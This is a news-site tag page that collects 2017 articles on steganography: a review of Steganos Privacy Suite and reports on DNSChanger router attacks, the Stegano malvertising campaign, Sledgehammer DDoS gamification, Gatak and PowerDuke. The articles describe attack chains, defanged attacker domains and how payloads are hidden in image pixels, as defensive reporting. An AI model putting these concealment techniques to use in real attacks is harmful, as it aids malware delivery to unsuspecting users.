8.7 C
Wednesday, September 20, 2017
Home Tags Steganography

Tag: Steganography

At least three cyber espionage campaigns and several malware samples in recent months have employed ancient technique, Kaspersky Lab says.
Today, a dangerous new trend is emerging: steganography is increasingly being used by actors creating malware and cyber-espionage tools. Most modern anti-malware solutions provide little, if any, protection from steganography, while any carrier in which a payload can be secretly carried poses a potential threat.

Steganos Privacy Suite 18

If a website's massive data breach compromises your privacy, there's not much you can do. It's out of your hands. But that doesn't mean you're completely helpless. There's plenty you can do to protect your own privacy, things like encrypting your files, and protecting your passwords. Steganos Privacy Suite 18 brings together a variety of useful privacy-related tools. However, the quality of the tools varies, and the suite lacks some useful features found in competing products.

With most antivirus tools, security suites, and password managers, you pay a yearly subscription fee. That's not the case with Steganos. For $59.95 you can install it on up to five PCs and use it for as long as you like. The only thing you don't get is a free update to the next version.

Earlier editions of this product included VPN protection, but the current product lineup makes Steganos Online Shield VPN a separate product. As I write this, Steganos is running a promotion that gives you the VPN for free when you purchase the suite. Note, though, that PCMag's Max Eddy gave this VP service just two out of five stars.

Getting Started with Steganos

After the quick, simple installation Steganos displays its main window. At the left is a three-by-three matrix of icons representing the suite's features: Safe, Portable Safe, Crypt & Hide, Password Manager, Private Favorites, E-Mail Encryption. Shredder, Trace Destructor, and Privacy. The suite is effectively a launch pad for these utilities.

The right-hand portion of the main window is a kind of security progress report. Just by installing the suite, you start with a 20 percent security level. Creating an encrypted safe for storing sensitive files gets you another 20 percent, and setting up the password manager raises it by another 20. Using the password manager's bonus ability to store private favorites adds 20 percent more. Configuring the Privacy components takes you to 100 percent. I like the way this simple report encourages full use of the product's features.

Standalone Products

Several components of the Steganos Privacy Suite are available as standalone products. I'll summarize my findings regarding those products. To get full details, please click the links to read my reviews.

Steganos Safe 18 lets you create any number of safes, which are encrypted storage containers for your sensitive files. You can create safes on your PC, on portable devices, or in your cloud storage accounts. When a safe is open, you use it exactly like any disk drive. When it's shut, its contents are completely inaccessible.

Steganos Safe is extremely easy to use, more so than most container-based encryption products. In addition, it offers some seriously sneaky techniques for hiding the very existence of your safes from prying eyes. For example, you can hide a fairly small safe inside an audio, video, or executable file. And the Safe in a Safe feature lets you dedicate a percentage of a visible safe for use as a discrete, invisible storage location, with its own separate password.

Along with the encryption tool, you also get Steganos Shredder, a secure deletion shredder utility. You can securely delete any file or folder by selecting Destroy from the right-click menu. With this tool you can also shred all of the free space on disk, effectively applying secure deletion to already-deleted files. It can also wipe any disk drive (except the active Windows drive) so thoroughly that a format is required when it's done.

Steganos Password Manager 18 handles the basic tasks of password capture and replay, and includes a password generator. Unlike most competing products, it doesn't directly handle syncing your passwords between devices; if you want syncing, you must connect to your existing cloud storage. You also get a limited ability to fill Web forms with personal data.

In testing, I couldn't get the password manager's Firefox extension to load. Also, some features worked in Chrome but not in Internet Explorer. If you get this password manager as part of the Steganos suite, you might as well use it. But if you're shopping for a standalone password manager, there are much better choices.

The two standalone Steganos products I've reviewed account for five of the suite's nine component icons. Password Manager and Private Favorites both correspond to Steganos Password Manager. Safe and Portable Safe are parts of Steganos Safe, as is Shredder. For the remainder of this review I'll focus on the rest of the privacy components.

Encrypt and Hide

The name Steganos comes from the term steganography, which is not the same as encryption. The aim of encryption is to ensure that others can't decipher your secrets. The aim of steganography is to conceal the fact that you have secrets. When you process a file through the suite's Crypt & Hide component and then shred the original, a hacker or snoop won't find any evidence that the sensitive data exists.

I don't know precisely how this tool processes files—it's not in the company's interest to reveal such information. But here's a simple example of how steganography could work to hide a file inside an image. First, picture that the file contains a list of numbers representing the exact color of each pixel in the image. Now round all those numbers so they're even. That tiny change doesn't make a visible difference in the image. Convert your secret file into a stream of bits, and step through the list of the image's pixels, leaving the color number unchanged for zero bits and making it odd for one bits. You've hidden the file in a way that's completely recoverable, but the image doesn't look appreciably different.

Steganos can use BMP, WAV, or JPG files as carriers for encrypted data. The help system advises using a carrier file at least 20 times the size of the encrypted data. You can also use it to create encrypted archives without hiding them, much as you'd do with a ZIP archive utility. Note, though, that the archives created by Steganos use the proprietary EDF format, not the standard ZIP format.

To create a simple encrypted archive, drag files and folders onto the Crypt & Hide dialog, or browse to locate the desired items. You can also enter a text description of the contents. Clicking Save lets you define the name and location for the resulting EDF file. The password entry dialog is the same as that used by Steganos Safe and Steganos Password Manager. It rates password strength as you type, with the option to use a virtual keyboard, or to define the password by clicking a sequence of pictures.

To create an encrypted file and also hide it, follow precisely the same procedure, but click the Hide button instead of the Save button, and choose a BMP, WAV, or JPG file as carrier. That's it. Your secret files are hidden within the chosen carrier. Don't believe it? Launch Crypt & Hide again, choose Open, and select your carrier. Once you enter the password, your files are back. Of course you must use the shredder to destroy the originals.


As you use your computer and browse the Web, you leave behind traces of what you've been doing. Sure, you hid your secret plans using Crypt & Hide, but if MyWorldTakeover still shows up in the list of recent documents, you're busted. In a similar way, your browsing history may reveal way too much about what you've been researching. That's where TraceDestructor comes in.

TraceDestructor clears various types of browsing traces from Chrome, Firefox, Internet Explorer, and Microsoft Edge. For Edge, it just clears cookies and cached files. For the others, it can also wipe out such things as history, autocomplete data, and passwords. It can also empty the Recycle Bin and eliminate Windows temporary files, recently used file lists, and other traces.

Cleaning up traces doesn't take long. When the process has finished, Steganos advises you to log off and on again, for full cleanup. Simple!

Privacy Settings

Clicking the Privacy icon brings up a simple settings dialog with four on/off switches, all off by default. I couldn't test Webcam protection, because my virtual machine test systems simply don't have webcams. In addition, every time I opened Privacy Settings I got a notification from Windows that the webcam privacy component crashed.

Webcam protection does nothing but deactivate your webcam, so you must turn that protection off if you want to use the cam for videoconferencing. A similar feature in ESET Internet Security 10 lets you disable the webcam in general but enable specific programs. That would prevent webcam spying while still letting you Skype, for example.

Kaspersky Total Security also offers webcam blocking for all but permitted programs. It extends similar protection to the microphone, to head off the possibility of a snoop listening in on your activities.

Internet advertisers work hard to profile your personal surfing habits, so they can target ads based on your interests. If you've ever bought (or looked at) a product on one site and then seen an ad for that product on a different site, you've seen this process in action. You can set your browser to send a Do Not Track header with each request, but sites aren't compelled to obey this header. The Prevent tracking option in Steganos filters out tracking activity before it reaches the browser.

Some trackers skip the usual techniques for tying together all data about your online activity, instead trying to create a fingerprint of your devices and activity, including precise data about the browsers you use. Steganos lets you replace your actual browser details with a generic fake set, to anonymize your browser type. Finally, you can choose to block advertisements altogether. The Block ads, Prevent tracking, and Anonymize browse type settings are simple on/off switches.

In testing, these three privacy elements initially didn't work. I confirmed this using various online tests. I reinstalled the product, to no avail. I installed it on a physical system, thinking that it might be incompatible with running in a virtual machine. Here, too, the privacy elements just didn't work. Tech support determined this was due to the absence of a proxy process that provides all three types of filtering.

Going back and forth with tech support, I determined that the installer failed to create a necessary configuration file. Even after I manually copied the config file that tech support supplied, it did not launch the proxy process. After more back and forth, I got the proxy running on both systems. It seemed to be running smoothly on the physical system, but its output on the virtual system contained many error messages. That being the case, I focused on the physical system.

There's no way to tell if the Prevent tracking feature is working, but Anonymize browser type should change the user agent string that your browser sends to every website. It did not do so. And although the filter's output log contained tons of ad blocking reports, the ads visibly weren't blocked.

The worst thing about this component is that even when its proxy failed to load, it didn't display any kind of error message. The privacy features work silently, so you'd have no idea that they weren't functioning, unless you noticed its failure to block ads.

There is one icon I haven't covered, E-Mail Encryption. I've skipped this one for several reasons. First, it is not a Steganos product; it's from another company, MyNigma. Second, on a PC it only functions as an Outlook plug-in, and my test systems don't have Outlook. Third, it only works to encrypt email between other users of MyNigma, so it's not useful for general-purpose encrypted communication.

Another Take on Privacy

Abine Blur is another suite of tools aimed at protecting your privacy. Its active Do Not Track component goes way beyond just sending the DNT header, which websites can ignore. Furthermore, unlike Steganos, it makes its activity visible. It includes a simple password manager, but goes beyond Steganos by offering a safety report that flags weak and duplicate passwords.

Blur protects your privacy by masking email accounts, credit cards, and (on a smartphone) phone numbers. Suppose you make a purchase from a merchant using a masked email account, and a masked credit card. Mail from the merchant reaches your inbox, but you can delete the masked account if it starts getting spam. And a merchant who doesn't have your real credit card number can't sell the card data or overcharge you. Read my review for a full explanation.

Blur doesn't block ads, and it doesn't include file encryption, but all of its components are directly aimed at protecting your privacy. Even if you do install the Steganos suite, consider trying Blur's free edition for additional protection. Note that if you do opt for a $39-per-year premium subscription, you can use Blur on all your devices.

Do You Already Have It?

You may also find that you've already got significant privacy protection courtesy of your security suite. For example, Kaspersky and AVG Internet Security include an active Do Not Track system, like what Blur offers, and Kaspersky can block banner ads. Webcam protection in Kaspersky and ESET goes farther than what you get with Steganos.

As for encrypted storage, the core of Steganos Privacy Suite, you can find a similar feature in many suites, among them McAfee LiveSafe, Bitdefender, Kaspersky, and Trend Micro. Admittedly, none of the suites build out this feature into the comprehensive encryption system that is Steganos Safe.

As for password management, it's becoming a common bonus feature in larger suites. Webroot includes a version based on award-winning LastPass, and McAfee comes with all the multi-factor authentication glory of True Key. Symantec Norton Security Premium, Trend Micro, ESET, Kaspersky, and Bitdefender are among the other suites with a password manager built right in.

Before you purchase a set of privacy tools, check to see what you already have right in your existing security suite.

A Mixed Bag

Steganos Safe is easier to use than other container-based encryption programs, and has some nifty features to both encrypt and hide your files. However, Steganos Password Manager lacks advanced features, and some of its features didn't work in testing. The Crypt & Hide component is a kick, as it truly hides your secrets, leaving no trace. But the browser-related privacy filters just didn't work in testing. Steganos Privacy Suite is a mixed bag, for sure.

There aren't many utilities specifically devoted to privacy. Abine Blur Premium remains our Editors' Choice in this interesting field. I look forward to seeing more competition in the specific area of privacy protection.

Back to top

PCMag may earn affiliate commissions from the shopping links included on this page. These commissions do not affect how we test, rate or review products. To find out more, read our complete terms of use.

Software nasty is packed with exploits for vulnerabilities in home broadband boxes Malware that spreads via evil web ads and menaces broadband routers has been discovered – and it's going to be particularly horrible for small business and home internet users, which it targets. This latest variant of the years-old DNSChanger nasty, just spotted by Californian infosec biz Proofpoint, works like this: some JavaScript code is hidden in advertisements placed on mainstream websites via ad networks. The code – which prefers Chrome on Windows and Android – checks for the local IP address of the browser visiting the site using a WebRTC request to a Mozilla STUN server. If the target isn't in the desired IP range for the attacker, a legitimate advert is fetched and displayed, and nothing further happens. If the IP address is within range, the JS code downloads a bogus ad in the form of a PNG image, and extracts HTML from the comment field of the picture. The HTML is rendered in the page and it redirects the browser to another website that hosts the DNSChanger Exploit Kit. Evil JavaScript on that webpage then fetches an AES key, concealed in an image using steganography, that is used to decrypt a separate payload that contains more code, a bunch of default username and passwords used in broadband routers, and 166 fingerprints used to identify the victim's router. Next, the exploit kit, running within the browser using the decrypted data, tries to figure out the router being used from the list of possible fingerprints. If there's a match, it fetches the necessary code to run to exploit vulnerabilities in that particular gateway to hijack it. If there is no match, it tries out all the default login credentials, and if those don't work, it tries to run a load of exploits against common vulnerabilities in devices. The ultimate aim is to connect to the router on the local network from the victim's browser and abuse security shortcomings – such as known default passwords or programming blunders – to commandeer the gateway and change its DNS settings to rogue name servers. Then when computers join the local network, they may, depending on their configuration, pick up the bad DNS settings from the router and run domain-name lookups through hacker-controlled name servers. Whoever controls those servers can make people's browsers connect to malevolent systems masquerading as legit websites that steal login information; inject more malware onto the victim's PCs by redirecting downloads; serve them dodgy ads rather than real ones the browser was supposed to display; and so on. Proofpoint's diagram showing the infection path ... Click for full diagram Some of the infection exploits also start up vulnerable services on the routers that nasties like the Mirai botnet can attack to also joyride the gateway. Devices known to be vulnerable to DNSChanger EK include: D-Link DSL-2740R COMTREND ADSL Router CT-5367 C01_R12 NetGear WNDR3400v3 (and likely other models in this series) Pirelli ADSL2/2+ Wireless Router P.DGA4001N Netgear R6200 "When attackers control the DNS server on a network, they open up the possibility of carrying out a wide range of malicious actions on devices connecting to the network," Proofpoint said last week. "These can include banking fraud, man-in-the-middle attacks, phishing, ad fraud, and more. In this case, the DNSChanger exploit kit allows attackers to leverage what is often the only DNS server on a SOHO network – the internet router itself. In general, avoiding these attacks requires router manufacturers to regularly patch their firmware and users to regularly apply these patches." At present, it looks as though the DNSChanger masterminds are purely looking to reroute connections to legitimate advertising brokers to other networks, via the hijacked DNS settings, thus forcing browsers to display adverts the crooks can make money off. Fogzy and TrafficBroker appear to be getting the most of this redirected traffic at the moment, and both companies have been advised that there's something dodgy going on. We were told on Monday that Fogzy has now blocked the redirection. "Unfortunately, there is no simple way to protect against these attacks. Applying the latest router updates remains the best way to avoid exploits," Proofpoint said. Changing the username and password for the admin interface is also a good idea, as is logging out of the router when you're not fiddling with its settings. Some gateways can still be vulnerable even if you've taken these precautions. "Changing the default local IP range, in this specific case, may also provide some protection. Neither of these solutions, though, is a typical action performed by average users of SOHO routers," the biz continued. ® Sponsored: Customer Identity and Access Management
Gionnicoreader comments 13 Share this story As you read these words, malicious ads on legitimate websites are targeting visitors with malware.

But that malware doesn't infect their computers, researchers said.
Instead, it causes unsecured routers to connect to fraudulent domains. Using a technique known as steganography, the ads hide malicious code in image data.

The hidden code then redirects targets to webpages hosting DNSChanger, an exploit kit that infects routers running unpatched firmware or are secured with weak administrative passwords. Once a router is compromised, DNSChanger configures it to use an attacker-controlled domain name system server.

This causes most computers on the network to visit fraudulent servers, rather than the servers corresponding to their official domain. Patrick Wheeler, director of threat intelligence for security firm Proofpoint, told Ars: These findings are significant because they demonstrate clearly that ubiquitous and often-overlooked devices are being actively attacked, and once compromised, these devices can affect the security of every device on the network, opening them up to further attacks, pop-ups, malvertising, etc.

Thus, the potential footprint of this kind of attack is high and the potential impact is significant. Lots of moving parts The ads first check if a visitor's IP address is within a targeted range, a behavior that is typical of many malvertising campaigns, which aim to remain undetected for as long as possible.
If the address isn't one the attackers want to target, they serve a decoy ad with no exploit code in it.
In the event the IP address is one the attackers want to infect, they serve a fake ad that hides exploit code in the metadata of a PNG image.

The code, in turn, causes the visitor to connect to a page hosting DNSChanger, which once again checks the visitor's IP address to ensure it's within the targeted range. Once the check passes, the malicious site serves a second image concealed with the router exploit code. Enlarge / DNSChanger attack chain. Proofpoint "This attack is determined by the particular router model that is detected during the reconnaissance phase," a Proofpoint researcher who uses the moniker Kafeine wrote in a blog post. "If there is no known exploit, the attack will attempt to use default credentials." In the event there are no known exploits and no default passwords, the attack aborts. Enlarge / A fake DNSChanger ad. Proofpoint DNSChanger uses a set of real-time communications protocols known as webRTC to send so-called STUN server requests used in VoIP communications.

The exploit is ultimately able to funnel code through the Chrome browser for Windows and Android to reach the network router.

The attack then compares the accessed router against 166 fingerprints of known vulnerable router firmware images. Proofpoint said it wasn't possible to name all the vulnerable routers, but a partial list includes: D-Link DSL-2740R COMTREND ADSL Router CT-5367 C01_R12 NetGear WNDR3400v3 (and likely other models in this series) Pirelli ADSL2/2+ Wireless Router P.DGA4001N Netgear R6200 The malicious ads are delivered in waves lasting several days at a time through legitimate ad networks and displayed on legitimate websites. Proofpoint's Wheeler said there isn't enough data to know how many people have been exposed to the ads or how long the campaign has been running, but he said the attackers behind it have previously been responsible for malvertisements that hit more than 1 million people a day.

The campaign was still active at the time this post was being prepared. Proofpoint didn't identify any of the ad networks or websites delivering or displaying the malicious ads. As Ars reported last week, a similar malvertising campaign—images with hidden code that double-check IP addresses—also reached more than 1 million people a day. Proofpoint said the two campaigns aren't related. DNS servers translate domain names such as arstechnica.com into IP addresses such as, which computers need to find and access the site.

By changing router settings to use an attacker-controlled server, DNSChanger can cause most, if not all, connected computers to connect to impostor sites that look just like the real ones.
So far, the malicious DNS server used by DNSChanger appears to be falsifying IP addresses to divert traffic from large ad agencies in favor of ad networks known as Fogzy and TrafficBroker.

But the server could be updated at any time to falsify lookups for Gmail.com, bankofamerica.com, or any other site.
In such a scenario, HTTPS protections wouldn't flag the impostor. The best defense against these attacks is to ensure routers are running the latest available firmware and are protected with a long password that's generated randomly or through a technique known as diceware.

Disabling remote administration and changing its default local IP address can also be helpful.
Attackers are targeting more than 166 router models with an exploit kit called DNSChanger that is being distributed via malvertising. Researchers at Proofpoint said the exploit kit is unique because the malvertising component of the attack doesn’t target browsers, rather a victim’s router. Some of the vulnerable routers include specific models made by D-Link, Netgear and those that serve the SOHO market such as Pirelli and Comtrend, according to Proofpoint which published its research Tuesday. Owners of routers vulnerable to DNSChanger are urged to update their equipment’s firmware. The router vulnerability exploited by DNSChanger is not to be confused vulnerabilities found in Netgear routers last week that could allow an attack to gain root access to devices remotely. DNSChanger attacks begin with hackers buying and placing ads on mainstream websites.

Those ads contain malicious JavaScript code that can reveal a user’s local IP address by triggering what is called a WebRTC request to a Mozilla STUN server (stun.services.mozilla[.]com). WebRTC, is a protocol for web communication.
STUN (Session Traversal Utilities for NAT) servers send a ping back that contains the IP address and port of the client; from the server’s perspective.

The local and public IP addresses of the user can be gleaned from these requests via the JavaScript. Once attackers establish a target’s local IP address they try to ascertain whether the target is worth attacking.
If not, a victim is shown a benign ad.

Desirable targets receive a fake ad in the form of a PNG image. Proofpoint said JavaScript is then used to extract HTML code from the comment field on the PNG file and redirects victims to the landing page of the DNSChanger EK. Next, DNSChanger uses Chrome to load multiple functions including an AES key concealed with steganography in a small image.

The AES key is used to cloak traffic and decrypt router fingerprints used to determine if a target is using vulnerable model. “Once it performs the reconnaissance functions, the browser will report back to the DNSChanger EK which returns the proper instructions to perform an attack on the router,” Proofpoint said. “The Chrome browser is functioning correctly, but the router has vulnerabilities that can be exploited.

Because browsers must talk with routers through which clients connect to the Internet, legitimate traffic/connections can be exploited to change the router’s DNS settings,”Patrick Wheeler, director of threat intelligence at Proofpoint, said. “The browser is simply doing what it is supposed to, talking with the router and, ultimately, receiving DNS information from it.” In cases where the router is not vulnerable, attackers will use DNSChanger to attempt to use default credentials to change DNS entries.
If the vulnerability is present, attackers will use the known router exploits to modify the DNS entries in the router and also try to make administration ports available from external addresses for additional attacks. The goal is to change DNS records on routers so cybercriminals can steal traffic from large web ad agencies such as Propellerads, Popcash and Taboola. “At the time of our examination, they were redirecting the traffic to Fogzy (a.rfgsi[.]com) and TrafficBroker,” Proofpoint wrote. Wheeler said there are also indications that DNSChanger is being used in man-in-the-middle attacks. He added, “We do not rule out the possibility of future malicious actions depending on the motivation or goals of those controlling the exploit kit.” Mitigation efforts include applying the latest manufacturer router updates. Proofpoint also recommends a number of ways to tighten security to lesson the likelihood of an attack.

Those recommendations include changing the default local IP range on routers, disabling remote administration features on SOHO routers and using ad-blocking browser add-ons.
A Turkish hacking crew is luring participants to join its DDoS platform to compete with peers to earn redeemable points that are exchangeable for hacking tools and click-fraud software. The goal, security researchers say, is to “gamify” DDoS attacks in order to attract a critical mass of hackers working toward a unified goal. The hacking platform is called Surface Defense and is being promoted in Turkish-language Dark Web forums including Turkhackteam and Root Developer, according to Forcepoint Security Labs, the security firm that first uncovered and reported the DDoS platform. Promoters of Surface Defense are actively recruiting Turkish hackers that may be sympathetic to Turkish nationalist beliefs, Forcepoint believes. Targets of the DDoS attacks range from the Kurdistan Workers Party, German Christian Democratic Party and the Armenian National Institute website in Washington D.C., said Carl Leonard, principal security analyst at Forcepoint. “It’s unclear if those behind the Surface Defense platform are indeed politically motivated or they are simply using politics as a marketing tool to lure hackers into their network.” Forcepoint believes that this is the first time a hacker has “gamified” a hacking platform to the extent that participants compete against one another and can compare scores and redeem points for rewards on a single service. Hackers are recruited via Turkish Dark Web hacker forums, and to participate in the program they must download the Surface Defense collaboration program and register. Surface Defense runs locally on a computer. Users congregate online within the program and can communicate and compare points they earn. Next, participants are required to download a DDoS attack tool called Sledgehammer. Sledgehammer is software that comes preconfigured to perform HTTP-based Slowloris-type DDoS assaults against 24 preselected sites determined by the software’s author. “Those who appear on this target list appear to be there for political reasons… Users receive a point for every 10 minutes they attack one of the websites,” according to Forcepoint, which on Wednesday released its report. Sledgehammer utilizes the PC’s resources to conduct the attack, routing DDoS traffic through the anonymizing Tor service. Currently, there is little evidence that the hacking group has successfully knocked a targeted site offline. “We believe that those behind Sledgehammer are in the participant acquisition phase and are trying to reach critical mass,” Leonard said. Threatpost contacted one Sledgehammer target, the Armenian National Institute, which said it was unaware of any recent attempted site disruptions. Once a participant achieves a certain level of points they are awarded an unlocked version of Sledgehammer that they can customize and re-distributed to conduct DDoS attacks themselves. The zinger for participating hackers, Forcepoint said, is that Sledgehammer has an unadvertised backdoor that allow the program’s authors to access computers running the DDoS software. According to researchers: “The backdoor is a very small Trojan and its sole purpose is to download, extract and execute another .NET assembly from within a bitmap image. It also downloads a secondary ‘guard’ component which it installs as a service. This ‘guard’ component ensures that if the backdoor is deleted then it will be re-downloaded and also installed as a service.” The bitmap image downloaded by the backdoor, using steganography to hide code, contains the embedded .NET assembly. “The first pixel’s ARGB value indicates the size of the payload, and the rest of the image contains the payload itself,” Forcepoint said. Hackers are also rewarded with a “Trojanized Adfly click fraud bot that includes code snippets for generating revenue via the Adfly,” Forcepoint said. Adfly is a legitimate web page redirection service that shows interstitial ads and allows people to generate revenue via clicks. Forcepoint said that the “click fraud” bots are specially crafted to be used to generate revenue on pay-to-click sites such as Ojooo, PTCFarm and Neobux. Researchers said it is unclear how hackers leverage the malicous Adfly version to make money, if at all. Leonard said there are strong indicators that the hacked version of the Adlfy component does not work. However, according to Forcepoint, the Adfly also contains the same backdoor as the DDoS tool Sledgehammer. Leonard believes the authors behind the platform go by the handle “Mehmet.” He said two YouTube channels tied to a user named Mehmet contain Sledgehammer tutorials and information on the Root Developer hacker forum. “Surface Defense creates a very unique hacker community we have never seen before. This system has been very cleverly designed to appeal to participants with multiple motivations. But ultimately the participants can be backdoored themselves and become a victim to attack,” Leonard said.
reader comments 67 Share this story Millions of people visiting mainstream websites over the past two months have been exposed to a novel form of malicious ads that embed attack code in individual pixels of the banners. Researchers from antivirus provider Eset said "Stegano," as they've dubbed the campaign, dates back to 2014.

Beginning in early October, its unusually stealthy operators scored a major coup by getting the ads displayed on a variety of unnamed reputable news sites, each with millions of daily visitors.

Borrowing from the word steganography—the practice of concealing secret messages inside a larger document that dates back to at least 440 BC—Stegano hides parts of its malicious code in parameters controlling the transparency of pixels used to display banner ads. While the attack code alters the tone or color of the images, the changes are almost invisible to the untrained eye.Enlarge / Left: Clean picture; middle: picture with malicious content; right: malicious version enhanced for illustrative purposes. Eset The malicious script is concealed in the alpha channel that defines the transparency of pixels, making it extremely difficult for even sharp-eyed ad networks to detect.

After verifying that the targeted browser isn't running in a virtual machine or connected to other types of security software often used to detect attacks, the script redirects the browser to a site that hosts three exploits for now-patched Adobe Flash vulnerabilities. "We can say that even some of the other major exploit kits, like Angler and Neutrino, are outclassed by the Stegano kit in terms of referrals—the websites onto which they managed to get the malicious banners installed," Eset researchers wrote in a report published Tuesday. "We have observed major domains, including news websites visited by millions of people every day, acting as 'referrers' hosting these advertisements. Upon hitting the advertising slot, the browser will display an ordinary-looking banner to the observer.

There is, however, a lot more to it than advertising." The ads promote applications calling themselves "Browser Defence" and "Broxu" and targeted people who visited the news sites using Internet Explorer browsers.

The script concealed in the pixels exploited a now-patched IE vulnerability indexed as CVE-2016-0162 to obtain details about the visitors' computers.

Among other things, the script checked for the presence of packet capture, sandboxing, and virtualization software and a variety of security products. Machines that didn't exhibit signs of the software and contained a vulnerable version of Flash were then redirected to the exploit site, which would serve one of two families of malware.

The Ursnif family is made up mainly of modules for stealing e-mail credentials, logging keystrokes, taking screenshots and videos, and acting as a backdoor.

The Ramnit variety of malware offers most of the same capabilities and mainly targets the banking industry. The attackers took extra pains to ensure the machines being infected didn't belong to security-savvy people who might detect what was happening.
In addition to a check carried out by the script embedded in the ad, a separate check was carried out by the exploit server before going through with the attack.

The Eset report didn't identify any of the sites that delivered the malicious ads.
It did say that the people exposed were concentrated in Canada, the UK, Australia, Spain, and Italy, which are the countries served by the affected ad networks.

Earlier versions of the campaign from 2014 and 2015 targeted people in the Netherlands and the Czech Republic.

The Flash vulnerabilities exploited included CVE-2015-8641, CVE-2016-1019, and CVE-2016-4117. Update: To execute the hidden payload, the malicious ads load a heavily modified version of Countly, an open-source package for measuring website traffic.

That JavaScript extracts the hidden code out of the image and executes it.

Because there's nothing per se malicious in the JavaScript, ad networks fail to detect what's happening. Referring to an ad located at hxxps://browser-defence.com/ads/s/index.html?w=160&h=600, Eset researchers described it this way: The index.html loads countly.min.js and feeds the initial parameters to the script.

This countly, however, is not the stock library of the open source mobile & web analytics platform you would download from github.
It is a heavily modified and obfuscated version, with some parts deleted and interlaced with custom code.

This custom code is responsible for an initial environment check.
Information about the environment is reported back to the server as XOR-encrypted parameters of the 1x1gif file, as captured in the image above. The following information about the environment is sent:systemLocale^screenResolution^GMT offset^Date^userAgent^pixelRatio After that, the script will request the advertising banner.

The server will reply with either a clean or a malicious version, most likely also depending on the previous environment check. The script will then attempt to load the banner and read the RGBA structure.
If a malicious version of the image was received, it will decode some Javascript and variables from the alpha channel The steganography is implemented in the following way: Two consecutive alpha values represent the tens and ones of a character code, encoded as a difference from 255 (the full alpha). Moreover, in order to make the change more difficult to spot by naked eye, the difference is minimized using an offset of 32. Researchers from Eset competitor Malwarebytes have published their own write-up of the campaign, which they are calling AdGholas. Despite targeting only people using IE and unpatched versions of Flash, Stegano is noteworthy for its concealment of exploit code in the pixels of the banner ads.

There's no reason future campaigns—or possibly ongoing ones that have yet to be discovered—couldn't exploit zero-day vulnerabilities that infected a much larger base of people. Until ad networks get much better at detecting malvertising campaigns, the scourge is likely to continue.
Software nasty also uses steganography to inject poison payload A Trojan targeting US healthcare organizations attempts to avoid detection by going to sleep for prolonged periods after initial infection, security researchers warn. Symantec estimates that thousands of organizations have been hit by the Gatak Trojan since 2012.

The malware is programmed to spread aggressively across an organization’s network once it gets a foothold. The healthcare sector in particular has been disproportionately targeted – of the top 20 most affected organizations with the highest number of infected computers, 40 per cent were in the healthcare sector, Symantec reports. Selling healthcare records is a growing trade on cybercrime forums.

This could explain the attackers’ heavy focus on the healthcare sector. Gatak reels in victims through websites promising product licensing keys for pirated enterprise software packages (backup, 3D scanning software, etc).

These supposed software license key generators (keygens) actually come packed with malicious code. The software nasty also spreads to a lesser extent using watering hole attacks (where the instigator infects websites that members of the group are known to visit). The malware creates a backdoor on compromised machines before stealing information. Hackers are known for leveraging the malware to break into machines on associated networks, probably using weak passwords and poor security in file shares and network drives. “In some cases, the attackers have infected computers with other malware, including various ransomware variants and the Shylock financial Trojan,” Symantec reports. “In the case of Shylock, these appear to be older versions of the threat and might even be 'false flag' infections. “They may be used by the group when they believe their attack has been uncovered, in order to throw investigators off the scent,” it adds. The malware downloads instructions from pre-programmed URLs.

These instructions are snuck past network defenses using steganography, a technique for hiding data within seemingly-innocuous (usually, image) files. ® Sponsored: Customer Identity and Access Management
As Trump was giving his victory speech, a new wave of spear phishing attacks from Russian hackers was already on its way using his win as click-bait.Gage Skidmore reader comments 30 Share this story Less than six hours after Donald Trump won the US presidential election, a new spear phishing campaign was launched by a Russia-based group. The group is apparently one of the two organizations connected to the breach at the Democratic National Committee, and it's responsible for nearly a decade of intelligence collection campaigns against military and diplomatic targets. Security firm Volexity refers to the group as "the Dukes" based on the malware family being utilized. According to a report by Volexity founder Steven Adair, the group is known for a malware family known as "the Dukes"—also referred to as APT29 or "Cozy Bear." The Dukes' primary targets in this latest round of attacks appear to be non-governmental organizations (NGOs) and policy think tanks in the US. According to Volexity's data, the threat group sent e-mails from purpose-built Gmail accounts and what may be a compromised e-mail account from Harvard University's Faculty of Arts and Science. The phishing e-mails dropped a new variant of backdoor malware dubbed "PowerDuke" by Volexity, and this malware gave attackers remote access to compromised systems. Volexity has been tracking a number of campaigns based on PowerDuke since August, when some "highly targeted" malicious e-mails were sent to individuals at a number of policy research organizations in the US and Europe. The e-mails were disguised as messages from the Center for a New American Security (CNAS), Transparency International, the Council on Foreign Relations, the International Institute for Strategic Studies (IISS), and Eurasia Group. Another wave of similar e-mails targeted universities in October. The latest round of e-mails, sent out on November 8 and 9, "were sent in large quantities to different individuals across many organizations and individuals focusing in national security, defense, international affairs, public policy, and European and Asian studies," Adair wrote. "Two of the attacks purported to be messages forwarded on from the Clinton Foundation giving insight and perhaps a postmortem analysis into the elections. Two of the other attacks purported to be eFax links or documents pertaining to the election’s outcome being revised or rigged. The last attack claimed to be a link to a PDF download on 'Why American Elections Are Flawed.'" A sample of one of the malicious "eFax" messages carrying PowerDuke. PowerDuke uses steganography to conceal its backdoor's code in a .PNG graphic file. The August attacks used legitimate content from the spoofed senders in Word and Excel documents to fool targets into opening attachments outside of a safe preview mode—scripts then downloaded the .PNG from a compromised Web server. The malware was next extracted from the .PNG and executed by Windows' rundll32.exe, residing only in memory and leaving no trace in the operating system. Once installed, the backdoor contacts a command and control network and allows the attackers to carry out a large range of commands—including the uploading and downloading of files, remote wiping of files, and accessing details about the infected machine, its user, and the network it runs on. This week's attacks used a combination of approaches to deliver PowerDuke. The e-mails had either malicious links to .ZIP files or forged Windows shortcut files linked to a "clean" Rich Text Format document and a PowerShell script that installed the malware. Two were "eFax" messages; the other three apparently came from the e-mail account of a senior research fellow at Harvard's Center for International Development. Two of those messages were spoofed forwards of messages from the Clinton Foundation using the same Harvard account. In all cases, the malware scripts included a variety of advanced anti-malware detection and virtual machine detection scripts to evade analysis. "The group’s anti-VM macros and PowerShell scripts appear to have drastically reduced the number of sandboxes and bots that the group has to deal with on their command and control infrastructure," Adair noted. "This combined with their use of stenography to hide their backdoor within PNG files that are downloaded remotely and loaded in memory only or via alternate data streams (ADS) is quite novel in its approach. Volexity believes that the Dukes are likely working to gain long-term access into think tanks and NGOs and will continue to launch new attacks for the foreseeable future."
